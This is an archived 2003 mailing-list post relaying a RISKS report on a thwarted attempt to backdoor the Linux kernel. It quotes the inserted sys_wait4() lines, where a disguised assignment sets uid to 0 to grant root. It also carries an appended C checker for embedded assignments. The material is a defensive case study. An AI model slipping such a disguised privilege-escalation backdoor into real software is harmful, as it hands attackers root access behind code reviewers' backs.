[Politech] How a backdoor in the Linux kernel was thwarted, from RISKS

From: Declan McCullagh (declan@private)
Date: Wed Nov 12 2003 - 12:31:04 PST

    ---
    
    Date: Tue, 11 Nov 2003 09:21:16 -0600
    From: "Douglas W. Jones" <jones@private>
    Subject: Thwarted Linux backdoor
    
    On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor into
    Linux was averted.  This is a really good example of the subtle kinds of
    hacks a source code examiner must be waiting to catch if we want genuinely
    secure voting systems under the current model of proprietary DRE systems
    with a closed-door source code examination.
    
    Someone broke into a server at kernel.kbits.net and inserted the following
    code into the Linux kernel:
    
             if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
                             retval = -EINVAL;
    
    This was done in the code sys_wait4().  Larry McVoy caught the fact that the
    change had been made, and was annoyed because it wasn't logged properly.
    Matthew Dharm asked "Out of curiosity, what were the changed lines."  Zwane
    Mwaikambo responded "That looks odd", and Andries Brouwer responded "Not if
    you hope to get root."
    
    So, an annoying violation of the software change logging requirements turned
    out to be an attempt to install a backdoor in Linux.  At least two very
    experienced programmers looked at it and saw just slightly odd code, before
    the serious nature of the threat was actually discovered.
    
    This particular attack, by the way, is ruled out by the current voting
    system standards, not because they require a comprehensive security
    analysis, but because of their C-centered coding rules.  Embedded assignment
    is forbidden.  Current source code checks are good at finding embedded
    assignments and flagging them (as long as the code is written in C).  No
    doubt, a hacker of the sophistication suggested by the attack illustrated
    above would strictly adhere to the coding guidelines in formulating their
    attack.
    
    For the complete story of this attack on Linux, including the actual E-mail
    exchange documenting the discovery of the attack, see:
    
         http://kerneltrap.org/node/view/1584
         Linux: Kernel "Back Door" Attempt
    
    This attack has only made the mainstream media in one place, so far:
    
         http://www.smh.com.au/articles/2003/11/07/1068013371170.html
         Bid to backdoor Linux kernel detected - smh.com.au
    
    This is a pity, because I think this story is really important.
    
    _______________________________________________
    Politech mailing list
    Archived at http://www.politechbot.com/
    Moderated by Declan McCullagh (http://www.mccullagh.org/)
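The coding-rule check Jones describes (flagging embedded assignment in C conditions) is easy to prototype. The checker below is an added example, not code from the original message or from the kernel project; it scans single-line `if (...)` conditions for a bare `=` that is not part of `==`, `!=`, `<=` or `>=`, and the sample lines it runs over are constructed from the snippet quoted above.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Return 1 if an `if (...)` condition on `line` contains a bare assignment
 * operator, else 0. Only handles conditions that fit on one line; string
 * literals inside the condition are skipped so "x=y" does not trigger. */
int has_embedded_assignment(const char *line)
{
    const char *p = strstr(line, "if");
    while (p) {
        /* accept only a whole-word "if" followed by an opening parenthesis */
        int word_start = (p == line) ||
                         !(isalnum((unsigned char)p[-1]) || p[-1] == '_');
        const char *q = p + 2;
        while (*q == ' ' || *q == '\t') q++;
        if (word_start && *q == '(') {
            int depth = 0;
            for (; *q; q++) {
                if (*q == '"') {                     /* skip string literal */
                    for (q++; *q && *q != '"'; q++)
                        if (*q == '\\' && q[1]) q++;
                    if (!*q) break;
                    continue;
                }
                if (*q == '(') depth++;
                else if (*q == ')') { if (--depth == 0) break; }
                else if (*q == '=') {
                    if (q[1] == '=') { q++; continue; }          /* == */
                    if (q[-1] == '!' || q[-1] == '<' || q[-1] == '>')
                        continue;                                /* != <= >= */
                    return 1;                /* bare '=' inside the condition */
                }
            }
        }
        p = strstr(p + 2, "if");
    }
    return 0;
}

int main(void)
{
    /* constructed sample: the attempted backdoor beside the innocent form */
    const char *lines[] = {
        "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))",
        "if ((options == (__WCLONE|__WALL)) && (current->uid == 0))",
        "if (a <= b && strcmp(s, \"x=y\") != 0)",
    };
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++)
        printf("%s  %s\n", has_embedded_assignment(lines[i]) ? "FLAG" : "ok  ", lines[i]);
    return 0;
}
```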
    



    This archive was generated by hypermail 2b30 : Wed Nov 12 2003 - 12:45:54 PST